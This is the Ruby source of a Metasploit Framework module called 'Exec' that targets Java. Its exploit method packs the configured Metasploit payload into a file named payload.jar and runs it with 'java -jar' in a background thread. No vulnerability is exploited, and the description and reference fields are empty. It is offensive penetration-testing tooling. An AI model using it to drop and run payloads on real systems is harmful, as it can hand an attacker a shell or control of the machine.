## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Java def initialize( info = {} ) super( update_info( info, 'Name' => 'Exec', 'Description' => %q{ }, 'License' => MSF_LICENSE, 'Author' => [ 'egypt' ], 'Version' => '$Revision$', 'References' => [ ], 'Platform' => [ 'java' ], 'Arch' => ARCH_JAVA, 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { } ], ], 'DefaultTarget' => 0 )) end def exploit # Equivalent to payload.encoded @jar_data = payload.encoded_jar.pack File.open("payload.jar", "wb") do |fd| fd.write(@jar_data) end Thread.new { system("java -jar payload.jar") } end end